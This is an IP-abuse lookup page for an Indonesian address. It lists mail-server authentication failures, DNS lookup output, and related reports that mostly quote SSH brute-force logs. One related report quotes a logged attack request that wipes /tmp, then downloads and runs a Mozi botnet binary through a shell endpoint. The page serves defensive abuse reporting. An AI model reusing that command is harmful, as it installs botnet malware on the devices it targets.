113.212.160.18

Basic Info

City: unknown

Region: unknown

Country: Indonesia

Internet Service Provider: PT. Cipta Informatika Cemerlang

Hostname: unknown

Organization: unknown

Usage Type: Fixed Line ISP

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	May 13 14:10:30 mail.srvfarm.net postfix/smtps/smtpd[553711]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed: May 13 14:10:30 mail.srvfarm.net postfix/smtps/smtpd[553711]: lost connection after AUTH from unknown[113.212.160.18] May 13 14:11:41 mail.srvfarm.net postfix/smtps/smtpd[553714]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed: May 13 14:11:41 mail.srvfarm.net postfix/smtps/smtpd[553714]: lost connection after AUTH from unknown[113.212.160.18] May 13 14:15:43 mail.srvfarm.net postfix/smtps/smtpd[553680]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed:	2020-05-14 02:49:32

Type

Details

Datetime

attackbots

May 13 14:10:30 mail.srvfarm.net postfix/smtps/smtpd[553711]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed: 
May 13 14:10:30 mail.srvfarm.net postfix/smtps/smtpd[553711]: lost connection after AUTH from unknown[113.212.160.18]
May 13 14:11:41 mail.srvfarm.net postfix/smtps/smtpd[553714]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed: 
May 13 14:11:41 mail.srvfarm.net postfix/smtps/smtpd[553714]: lost connection after AUTH from unknown[113.212.160.18]
May 13 14:15:43 mail.srvfarm.net postfix/smtps/smtpd[553680]: warning: unknown[113.212.160.18]: SASL PLAIN authentication failed:

2020-05-14 02:49:32

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 113.212.160.18
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 19529
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;113.212.160.18.			IN	A

;; AUTHORITY SECTION:
.			198	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020051301 1800 900 604800 86400

;; Query time: 84 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu May 14 02:49:25 CST 2020
;; MSG SIZE  rcvd: 118

Host info

Host 18.160.212.113.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 18.160.212.113.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
222.186.175.215	attackspambots	prod11 ...	2020-06-08 20:39:33
185.176.27.98	attack	06/08/2020-08:09:26.911878 185.176.27.98 Protocol: 6 ET DROP Dshield Block Listed Source group 1	2020-06-08 20:50:17
218.92.0.212	attack	Jun 8 15:08:48 ns381471 sshd[17680]: Failed password for root from 218.92.0.212 port 33454 ssh2 Jun 8 15:08:51 ns381471 sshd[17680]: Failed password for root from 218.92.0.212 port 33454 ssh2	2020-06-08 21:09:43
111.229.15.130	attackbotsspam	Jun 8 14:39:35 ns381471 sshd[16077]: Failed password for root from 111.229.15.130 port 52192 ssh2	2020-06-08 21:10:04
106.54.111.75	attackspam	Jun 8 06:00:54 server1 sshd\[5162\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.54.111.75 user=root Jun 8 06:00:56 server1 sshd\[5162\]: Failed password for root from 106.54.111.75 port 43684 ssh2 Jun 8 06:04:58 server1 sshd\[6281\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.54.111.75 user=root Jun 8 06:05:00 server1 sshd\[6281\]: Failed password for root from 106.54.111.75 port 33038 ssh2 Jun 8 06:09:10 server1 sshd\[7425\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.54.111.75 user=root ...	2020-06-08 21:02:18
111.250.183.217	attack	Jun 8 01:20:22 ns sshd[4204]: Connection from 111.250.183.217 port 36508 on 134.119.36.27 port 22 Jun 8 01:20:24 ns sshd[4204]: User r.r from 111.250.183.217 not allowed because not listed in AllowUsers Jun 8 01:20:24 ns sshd[4204]: Failed password for invalid user r.r from 111.250.183.217 port 36508 ssh2 Jun 8 01:20:24 ns sshd[4204]: Received disconnect from 111.250.183.217 port 36508:11: Bye Bye [preauth] Jun 8 01:20:24 ns sshd[4204]: Disconnected from 111.250.183.217 port 36508 [preauth] Jun 8 01:31:48 ns sshd[19248]: Connection from 111.250.183.217 port 56578 on 134.119.36.27 port 22 Jun 8 01:31:50 ns sshd[19248]: User r.r from 111.250.183.217 not allowed because not listed in AllowUsers Jun 8 01:31:50 ns sshd[19248]: Failed password for invalid user r.r from 111.250.183.217 port 56578 ssh2 Jun 8 01:31:50 ns sshd[19248]: Received disconnect from 111.250.183.217 port 56578:11: Bye Bye [preauth] Jun 8 01:31:50 ns sshd[19248]: Disconnected from 111.250.183.21........ -------------------------------	2020-06-08 20:56:42
203.202.252.246	attackbots	Unauthorized IMAP connection attempt	2020-06-08 20:48:52
222.186.173.201	attackspam	Jun 8 14:42:13 legacy sshd[3765]: Failed password for root from 222.186.173.201 port 27410 ssh2 Jun 8 14:42:17 legacy sshd[3765]: Failed password for root from 222.186.173.201 port 27410 ssh2 Jun 8 14:42:21 legacy sshd[3765]: Failed password for root from 222.186.173.201 port 27410 ssh2 Jun 8 14:42:24 legacy sshd[3765]: Failed password for root from 222.186.173.201 port 27410 ssh2 ...	2020-06-08 20:44:49
78.165.12.109	attack	Unauthorized connection attempt detected from IP address 78.165.12.109 to port 23	2020-06-08 21:08:07
51.15.226.137	attackbots	Jun 8 02:22:59 web1 sshd\[13053\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.15.226.137 user=root Jun 8 02:23:01 web1 sshd\[13053\]: Failed password for root from 51.15.226.137 port 34392 ssh2 Jun 8 02:26:33 web1 sshd\[13367\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.15.226.137 user=root Jun 8 02:26:35 web1 sshd\[13367\]: Failed password for root from 51.15.226.137 port 36876 ssh2 Jun 8 02:30:06 web1 sshd\[13668\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.15.226.137 user=root	2020-06-08 20:35:51
115.84.92.137	attackspambots	Dovecot Invalid User Login Attempt.	2020-06-08 20:53:21
91.234.62.28	attackspam	SS5,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	2020-06-08 20:36:15
80.82.65.74	attackspam	Unauthorized connection attempt detected from IP address 80.82.65.74 to port 8118	2020-06-08 20:37:21
112.85.42.188	attackspam	06/08/2020-08:53:44.045604 112.85.42.188 Protocol: 6 ET SCAN Potential SSH Scan	2020-06-08 20:55:44
183.67.95.182	attackbotsspam	Lines containing failures of 183.67.95.182 Jun 8 11:17:00 kopano sshd[11372]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.67.95.182 user=r.r Jun 8 11:17:03 kopano sshd[11372]: Failed password for r.r from 183.67.95.182 port 24209 ssh2 Jun 8 11:17:03 kopano sshd[11372]: Received disconnect from 183.67.95.182 port 24209:11: Bye Bye [preauth] Jun 8 11:17:03 kopano sshd[11372]: Disconnected from authenticating user r.r 183.67.95.182 port 24209 [preauth] Jun 8 11:21:14 kopano sshd[11511]: Connection closed by 183.67.95.182 port 15560 [preauth] Jun 8 11:24:56 kopano sshd[11672]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.67.95.182 user=r.r Jun 8 11:24:58 kopano sshd[11672]: Failed password for r.r from 183.67.95.182 port 63396 ssh2 Jun 8 11:24:58 kopano sshd[11672]: Received disconnect from 183.67.95.182 port 63396:11: Bye Bye [preauth] Jun 8 11:24:58 kopano sshd[11672]:........ ------------------------------	2020-06-08 20:32:29

Recently Reported IPs

52.255.142.30	178.79.32.15	170.130.69.188	78.188.168.64
90.53.122.154	187.240.206.174	215.239.112.43	90.189.229.9
142.93.124.210	45.66.208.247	78.189.190.149	171.246.211.113
18.215.254.243	106.53.8.137	179.189.19.133	69.167.40.150
150.107.242.91	8.238.23.126	106.74.36.68	86.74.26.166